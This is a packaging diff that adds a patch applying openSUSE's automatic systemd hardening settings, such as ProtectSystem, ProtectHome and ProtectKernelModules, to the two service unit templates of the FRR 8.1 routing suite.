b/harden_frr.service.patch @@ -0,0 +1,42 @@ +Index: frr-frr-8.1/tools/frr.service.in +=================================================================== +--- frr-frr-8.1.orig/tools/frr.service.in ++++ frr-frr-8.1/tools/frr.service.in +@@ -7,6 +7,16 @@ Before=network.target + OnFailure=heartbeat-failed@%n + + [Service] ++# added automatically, for details please see ++# https://en.opensuse.org/openSUSE:Security_Features#Systemd_hardening_effort ++ProtectSystem=full ++ReadWritePaths=/etc/frr ++ProtectHome=true ++ProtectKernelModules=true ++ProtectKernelLogs=true ++ProtectControlGroups=true ++RestrictRealtime=true ++# end of automatic additions + Nice=-5 + Type=forking + NotifyAccess=all +Index: frr-frr-8.1/tools/frr@.service.in +=================================================================== +--- frr-frr-8.1.orig/tools/frr@.service.in ++++ frr-frr-8.1/tools/frr@.service.in +@@ -7,6 +7,16 @@ Before=network.target + OnFailure=heartbeat-failed@%n + + [Service] ++# added automatically, for details please see ++# https://en.opensuse.org/openSUSE:Security_Features#Systemd_hardening_effort ++ProtectSystem=full ++ReadWritePaths=/etc/frr ++ProtectHome=true ++ProtectKernelModules=true ++ProtectKernelLogs=true ++ProtectControlGroups=true ++RestrictRealtime=true ++# end of automatic additions + Nice=-5 + Type=forking + NotifyAccess=all